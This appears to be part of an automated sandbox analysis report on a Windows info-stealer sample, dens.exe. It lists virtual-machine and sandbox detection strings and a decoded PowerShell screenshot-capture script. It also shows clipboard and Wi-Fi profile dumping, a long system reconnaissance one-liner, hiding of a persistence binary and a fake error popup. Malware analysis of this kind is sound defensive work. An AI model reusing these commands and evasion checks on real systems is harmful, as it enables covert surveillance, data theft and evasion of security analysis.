            Source: dens.exe, 00000001.00000003.2029829320.000002D9AB28F000.00000004.00000020.00020000.00000000.sdmp, dens.exe, 00000001.00000003.2052097478.000002D9AB28F000.00000004.00000020.00020000.00000000.sdmp, dens.exe, 00000001.00000002.2060887548.000002D9AB28F000.00000004.00000020.00020000.00000000.sdmp, dens.exe, 00000001.00000003.2047760361.000002D9AB28F000.00000004.00000020.00020000.00000000.sdmp, dens.exe, 00000001.00000003.2040630139.000002D9AB28F000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: _NAME: Hyper-V PowerShelJ
            Source: dens.exe, 00000001.00000002.2067199500.000002D9ADB10000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: \sdvmsrvc.exep
            Source: dens.exe, 00000001.00000003.1954169257.000002D9AC3C0000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: vmwaretray.e
            Source: dens.exe, 00000001.00000003.2029767074.000002D9ACB50000.00000004.00000020.00020000.00000000.sdmp, dens.exe, 00000001.00000002.2066795317.000002D9ACB50000.00000004.00000020.00020000.00000000.sdmp, dens.exe, 00000001.00000003.2034812709.000002D9AC52F000.00000004.00000020.00020000.00000000.sdmp, dens.exe, 00000001.00000003.2040344730.000002D9AC52F000.00000004.00000020.00020000.00000000.sdmp, sc.exe, 0000004A.00000002.1851582241.000001DE20E9A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: DISPLAY_NAME: Hyper-V Guest Shutdown Service
            Source: dens.exe, 00000001.00000003.2029767074.000002D9ACB50000.00000004.00000020.00020000.00000000.sdmp, dens.exe, 00000001.00000002.2066795317.000002D9ACB50000.00000004.00000020.00020000.00000000.sdmp, dens.exe, 00000001.00000003.2034812709.000002D9AC52F000.00000004.00000020.00020000.00000000.sdmp, dens.exe, 00000001.00000003.2040344730.000002D9AC52F000.00000004.00000020.00020000.00000000.sdmp, dens.exe, 00000001.00000002.2066553783.000002D9ACA40000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: DISPLAY_NAME: Hyper-V Guest Service Interface
            Source: dens.exe, 00000001.00000002.2067199500.000002D9ADB10000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: b'VMware'
            Source: dens.exe, 00000001.00000002.2067199500.000002D9ADB10000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: vmsrvc.exe
            Source: dens.exe, 00000001.00000002.2067199500.000002D9ADB10000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: vboxservice.exe
            Source: dens.exe, 00000001.00000002.2067199500.000002D9ADB10000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: mKVMware
            Source: dens.exe, 00000001.00000002.2067199500.000002D9ADB10000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: "vboxservice.exe"
            Source: dens.exe, 00000001.00000002.2067199500.000002D9ADB10000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: "vmsrvc.exe"`
            Source: dens.exe, 00000001.00000002.2067199500.000002D9ADB10000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: vboxtray.exe
            Source: dens.exe, 00000001.00000002.2067199500.000002D9ADB10000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: "vmwaretray.exe"
            Source: dens.exe, 00000001.00000003.2040630139.000002D9AB28F000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: _NAME: vmicshutdown
            Source: dens.exe, 00000001.00000002.2067199500.000002D9ADB10000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: vmwaretray.exe
            Source: dens.exe, 00000001.00000002.2067199500.000002D9ADB10000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: dvmusrvc.exe
            Source: dens.exe, 00000001.00000002.2067199500.000002D9ADB10000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: "vmwaretray.exe"p
            Source: dens.exe, 00000001.00000002.2067199500.000002D9ADB10000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: vmtoolsd.exe
            Source: sc.exe, 0000004A.00000002.1851582241.000001DE20E9A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V Guest Service InterfacevmicguestinterfaceVirtual DiskvdsCredential ManagerVaultSvcVolumetric Audio Compositor ServiceVacSvcUpdate Orchestrator ServiceUA
            Source: dens.exe, 00000001.00000002.2067199500.000002D9ADB10000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: "vmware"
            Source: dens.exe, 00000001.00000002.2067199500.000002D9ADB10000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: 3Udvmtoolsd.exeses0
            Source: dens.exe, 00000001.00000002.2067199500.000002D9ADB10000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: 'qemu'
            Source: dens.exe, 00000001.00000003.2036402580.000002D9ACC47000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: vmsrvc.exe",Y
            Source: dens.exe, 00000001.00000002.2067199500.000002D9ADB10000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: "vboxservice.exe"p
            Source: dens.exe, 00000001.00000003.2034812709.000002D9AC52F000.00000004.00000020.00020000.00000000.sdmp, dens.exe, 00000001.00000003.2040344730.000002D9AC52F000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: DISPLAY_NAME: Hyper-V Remote Desktop Virtualization Service
            Source: dens.exe, 00000001.00000002.2067199500.000002D9ADB10000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: "vmtoolsd.exe"
            Source: dens.exe, 00000001.00000002.2067199500.000002D9ADB10000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: dqemu-ga.exep
            Source: dens.exe, 00000001.00000002.2067199500.000002D9ADB10000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: dvboxservice.exe
            Source: sc.exe, 0000004A.00000002.1851582241.000001DE20E9A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: SERVICE_NAME: vmicheartbeat
            Source: dens.exe, 00000001.00000003.2040344730.000002D9AC52F000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: SERVICE_NAME: vmicvss
            Source: dens.exe, 00000001.00000003.2034812709.000002D9AC52F000.00000004.00000020.00020000.00000000.sdmp, dens.exe, 00000001.00000003.2040344730.000002D9AC52F000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V Requirements: VM Monitor Mode Extensions: No
            Source: dens.exe, 00000001.00000002.2067199500.000002D9ADB10000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: \sdvmsrvc.exe
            Source: dens.exe, 00000001.00000002.2067199500.000002D9ADB10000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: 7Ofvmware
            Source: HOSTNAME.EXE, 00000035.00000002.1805171561.00000166DF5B9000.00000004.00000020.00020000.00000000.sdmp, NETSTAT.EXE, 00000049.00000002.1850291858.000001E18BE47000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
            Source: ARP.EXE, 00000048.00000002.1849729767.0000021548F87000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllGG
            Source: dens.exe, 00000001.00000002.2067199500.000002D9ADB10000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: "vmtoolsd.exe"@
            Source: sc.exe, 0000004A.00000002.1851582241.000001DE20E9A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: SERVICE_NAME: vmicshutdown
            Source: dens.exe, 00000001.00000003.1775700959.000002D9ABFF2000.00000004.00000020.00020000.00000000.sdmp, dens.exe, 00000001.00000003.1781000596.000002D9AC026000.00000004.00000020.00020000.00000000.sdmp, dens.exe, 00000001.00000003.2029099108.000002D9AC036000.00000004.00000020.00020000.00000000.sdmp, dens.exe, 00000001.00000003.1776457067.000002D9AC037000.00000004.00000020.00020000.00000000.sdmp, dens.exe, 00000001.00000003.2036571955.000002D9AC081000.00000004.00000020.00020000.00000000.sdmp, dens.exe, 00000001.00000003.1781669123.000002D9AC027000.00000004.00000020.00020000.00000000.sdmp, dens.exe, 00000001.00000003.2036994849.000002D9AC03B000.00000004.00000020.00020000.00000000.sdmp, dens.exe, 00000001.00000003.1776089089.000002D9AC017000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: hostNames = ['sandbox','cuckoo', 'vm', 'virtual', 'qemu', 'vbox', 'xen']
            Source: dens.exe, 00000001.00000002.2067199500.000002D9ADB10000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: "vmsrvc.exe"
            Source: dens.exe, 00000001.00000002.2067199500.000002D9ADB10000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: dvboxtray.exe0
            Source: dens.exe, 00000001.00000003.2029829320.000002D9AB28F000.00000004.00000020.00020000.00000000.sdmp, dens.exe, 00000001.00000003.2052097478.000002D9AB28F000.00000004.00000020.00020000.00000000.sdmp, dens.exe, 00000001.00000002.2060887548.000002D9AB28F000.00000004.00000020.00020000.00000000.sdmp, dens.exe, 00000001.00000003.2047760361.000002D9AB28F000.00000004.00000020.00020000.00000000.sdmp, dens.exe, 00000001.00000003.2040630139.000002D9AB28F000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: _NAME: Hyper-V Remote De
            Source: dens.exe, 00000001.00000002.2067199500.000002D9ADB10000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: "vmwareuser.exe"0
            Source: dens.exe, 00000001.00000002.2067199500.000002D9ADB10000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: fqemu
            Source: dens.exe, 00000001.00000002.2067199500.000002D9ADB10000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: "vmusrvc.exe"
            Source: dens.exe, 00000001.00000002.2067199500.000002D9ADB10000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: "qemu-ga.exe"
            Source: dens.exe, 00000001.00000003.1776089089.000002D9AC017000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: "vmacthlp.exe", # VMware
            Source: dens.exe, 00000001.00000003.1954169257.000002D9AC3C0000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: if b'VMware' in stdout:
            Source: C:\Windows\System32\wbem\WMIC.exeProcess information queried: ProcessInformationJump to behavior
            Source: C:\Users\user\Desktop\dens.exeCode function: 0_2_00007FF62C10A614 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_00007FF62C10A614
            Source: C:\Users\user\Desktop\dens.exeCode function: 0_2_00007FF62C113480 GetProcessHeap,0_2_00007FF62C113480
            Source: C:\Windows\System32\tasklist.exeProcess token adjusted: DebugJump to behavior
            Source: C:\Windows\System32\tasklist.exeProcess token adjusted: Debug
            Source: C:\Windows\System32\tasklist.exeProcess token adjusted: Debug
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
            Source: C:\Windows\System32\tasklist.exeProcess token adjusted: Debug
            Source: C:\Windows\System32\tasklist.exeProcess token adjusted: Debug
            Source: C:\Windows\System32\NETSTAT.EXEProcess token adjusted: Debug
            Source: C:\Windows\System32\NETSTAT.EXEProcess token adjusted: Debug
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
            Source: C:\Users\user\Desktop\dens.exeCode function: 0_2_00007FF62C10A614 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_00007FF62C10A614
            Source: C:\Users\user\Desktop\dens.exeCode function: 0_2_00007FF62C0FC8A0 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,0_2_00007FF62C0FC8A0
            Source: C:\Users\user\Desktop\dens.exeCode function: 0_2_00007FF62C0FD12C IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_00007FF62C0FD12C
            Source: C:\Users\user\Desktop\dens.exeCode function: 0_2_00007FF62C0FD30C SetUnhandledExceptionFilter,0_2_00007FF62C0FD30C
            Source: C:\Users\user\Desktop\dens.exeCode function: 1_2_00007FF62C10A614 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,1_2_00007FF62C10A614
            Source: C:\Users\user\Desktop\dens.exeCode function: 1_2_00007FF62C0FC8A0 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,1_2_00007FF62C0FC8A0
            Source: C:\Users\user\Desktop\dens.exeCode function: 1_2_00007FF62C0FD12C IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,1_2_00007FF62C0FD12C
            Source: C:\Users\user\Desktop\dens.exeCode function: 1_2_00007FF62C0FD30C SetUnhandledExceptionFilter,1_2_00007FF62C0FD30C
            Source: C:\Users\user\Desktop\dens.exeCode function: 1_2_00007FFDFAA53028 IsProcessorFeaturePresent,memset,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,1_2_00007FFDFAA53028
            Source: C:\Users\user\Desktop\dens.exeCode function: 1_2_00007FFDFAA52A70 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,1_2_00007FFDFAA52A70
            Source: C:\Users\user\Desktop\dens.exeCode function: 1_2_00007FFDFACA2BE0 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,1_2_00007FFDFACA2BE0

            HIPS / PFW / Operating System Protection Evasion

            barindex
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIAB
            Source: C:\Windows\System32\cmd.exeProcess created: Base64 decoded $source = @"using System;using System.Collections.Generic;using System.Drawing;using System.Windows.Forms;public class Screenshot{ public static List<Bitmap> CaptureScreens() { var results = new List<Bitmap>(); var allScreens = Screen.AllScreens; foreach (Screen screen in allScreens) { try { Rectangle bounds = screen.Bounds; using (Bitmap bitmap = new Bitmap(bounds.Width, bounds.Height)) { using (Graphics graphics = Graphics.FromImage(bitmap)) { graphics.CopyFromScreen(new Point(bounds.Left, bounds.Top), Point.Empty, bounds.Size); } results.Add((Bitmap)bitmap.Clone()); } } catch (Exception) { // Handle any exceptions here } } return results; }}"@Add-Type -TypeDefinition $source -ReferencedAssemblies System.Drawing, System.Windows.Forms$screenshots = [Screenshot]::CaptureScreens()for ($i = 0; $i -lt $screenshots.Count; $i++){ $screenshot = $screenshots[$i] $screenshot.Save("./Display ($($i+1)).png") $screenshot.Dispose()}
            Source: C:\Windows\System32\cmd.exeProcess created: Base64 decoded $source = @"using System;using System.Collections.Generic;using System.Drawing;using System.Windows.Forms;public class Screenshot{ public static List<Bitmap> CaptureScreens() { var results = new List<Bitmap>(); var allScreens = Screen.AllScreens; foreach (Screen screen in allScreens) { try { Rectangle bounds = screen.Bounds; using (Bitmap bitmap = new Bitmap(bounds.Width, bounds.Height)) { using (Graphics graphics = Graphics.FromImage(bitmap)) { graphics.CopyFromScreen(new Point(bounds.Left, bounds.Top), Point.Empty, bounds.Size); } results.Add((Bitmap)bitmap.Clone()); } } catch (Exception) { // Handle any exceptions here } } return results; }}"@Add-Type -TypeDefinition $source -ReferencedAssemblies System.Drawing, System.Windows.Forms$screenshots = [Screenshot]::CaptureScreens()for ($i = 0; $i -lt $screenshots.Count; $i++){ $screenshot = $screenshots[$i] $screenshot.Save("./Display ($($i+1)).png") $screenshot.Dispose()}
            Source: C:\Users\user\Desktop\dens.exeProcess created: C:\Users\user\Desktop\dens.exe "C:\Users\user\Desktop\dens.exe"Jump to behavior
            Source: C:\Users\user\Desktop\dens.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"Jump to behavior
            Source: C:\Users\user\Desktop\dens.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "wmic computersystem get Manufacturer"Jump to behavior
            Source: C:\Users\user\Desktop\dens.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "gdb --version"Jump to behavior
            Source: C:\Users\user\Desktop\dens.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tasklist"Jump to behavior
            Source: C:\Users\user\Desktop\dens.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "wmic path Win32_ComputerSystem get Manufacturer"Jump to behavior
            Source: C:\Users\user\Desktop\dens.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1Jump to behavior
            Source: C:\Users\user\Desktop\dens.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tasklist"Jump to behavior
            Source: C:\Users\user\Desktop\dens.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "attrib +h +s "C:\Users\user\AppData\Local\WaltuhiumUpdateService\Waltuhium.exe""Jump to behavior
            Source: C:\Users\user\Desktop\dens.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tasklist"Jump to behavior
            Source: C:\Users\user\Desktop\dens.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "cmd.exe /c chcp"Jump to behavior
            Source: C:\Users\user\Desktop\dens.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1Jump to behavior
            Source: C:\Users\user\Desktop\dens.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1Jump to behavior
            Source: C:\Users\user\Desktop\dens.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell.exe Get-Clipboard"Jump to behavior
            Source: C:\Users\user\Desktop\dens.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "netsh wlan show profiles"Jump to behavior
            Source: C:\Users\user\Desktop\dens.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "echo ####System Info#### & systeminfo & echo ####System Version#### & ver & echo ####Host Name#### & hostname & echo ####Environment Variable#### & set & echo ####Logical Disk#### & wmic logicaldisk get caption,description,providername & echo ####User Info#### & net user & echo ####Online User#### & query user & echo ####Local Group#### & net localgroup & echo ####Administrators Info#### & net localgroup administrators & echo ####Guest User Info#### & net user guest & echo ####Administrator User Info#### & net user administrator & echo ####Startup Info#### & wmic startup get caption,command & echo ####Tasklist#### & tasklist /svc & echo ####Ipconfig#### & ipconfig/all & echo ####Hosts#### & type C:\WINDOWS\System32\drivers\etc\hosts & echo ####Route Table#### & route print & echo ####Arp Info#### & arp -a & echo ####Netstat#### & netstat -ano & echo ####Service Info#### & sc query type= service state= all & echo ####Firewallinfo#### & netsh firewall show state & netsh firewall show config"Jump to behavior
            Source: C:\Users\user\Desktop\dens.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "wmic csproduct get uuid"Jump to behavior
            Source: C:\Users\user\Desktop\dens.exeProcess created: unknown unknownJump to behavior
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\wbem\WMIC.exe wmic path win32_VideoController get nameJump to behavior
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\wbem\WMIC.exe wmic computersystem get ManufacturerJump to behavior
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\tasklist.exe tasklistJump to behavior
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\wbem\WMIC.exe wmic path Win32_ComputerSystem get Manufacturer
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\wbem\WMIC.exe wmic csproduct get uuid
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\tasklist.exe tasklist
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\attrib.exe attrib +h +s "C:\Users\user\AppData\Local\WaltuhiumUpdateService\Waltuhium.exe"
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\mshta.exe mshta "javascript:var sh=new ActiveXObject('WScript.Shell'); sh.Popup('The Program can\x22t start because api-ms-win-crt-runtime-|l1-1-.dll is missing from your computer. Try reinstalling the program to fix this problem', 0, 'System Error', 0+16);close()"
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\tasklist.exe tasklist
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\cmd.exe cmd.exe /c chcp
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\cmd.exe cmd.exe /c chcp
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\tasklist.exe tasklist /FO LIST
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe Get-Clipboard
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\chcp.com chcp
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\chcp.com chcp
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\netsh.exe netsh wlan show profiles
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\systeminfo.exe systeminfo
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\HOSTNAME.EXE hostname
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\wbem\WMIC.exe wmic logicaldisk get caption,description,providername
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\net.exe net user
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\query.exe query user
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\net.exe net localgroup
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\net.exe net localgroup administrators
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\net.exe net user guest
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\net.exe net user administrator
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\wbem\WMIC.exe wmic startup get caption,command
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\tasklist.exe tasklist /svc
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\ipconfig.exe ipconfig /all
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\ROUTE.EXE route print
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\ARP.EXE arp -a
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\NETSTAT.EXE netstat -ano
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc query type= service state= all
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\netsh.exe netsh firewall show state
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\netsh.exe netsh firewall show config
            Source: C:\Windows\System32\net.exeProcess created: C:\Windows\System32\net1.exe C:\Windows\system32\net1 user
            Source: C:\Windows\System32\query.exeProcess created: C:\Windows\System32\quser.exe "C:\Windows\system32\quser.exe"
            Source: C:\Windows\System32\net.exeProcess created: C:\Windows\System32\net1.exe C:\Windows\system32\net1 localgroup
            Source: C:\Windows\System32\net.exeProcess created: C:\Windows\System32\net1.exe C:\Windows\system32\net1 localgroup administrators
            Source: C:\Windows\System32\net.exeProcess created: C:\Windows\System32\net1.exe C:\Windows\system32\net1 user guest
            Source: C:\Windows\System32\net.exeProcess created: C:\Windows\System32\net1.exe C:\Windows\system32\net1 user administrator
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\wbem\WMIC.exe wmic csproduct get uuid
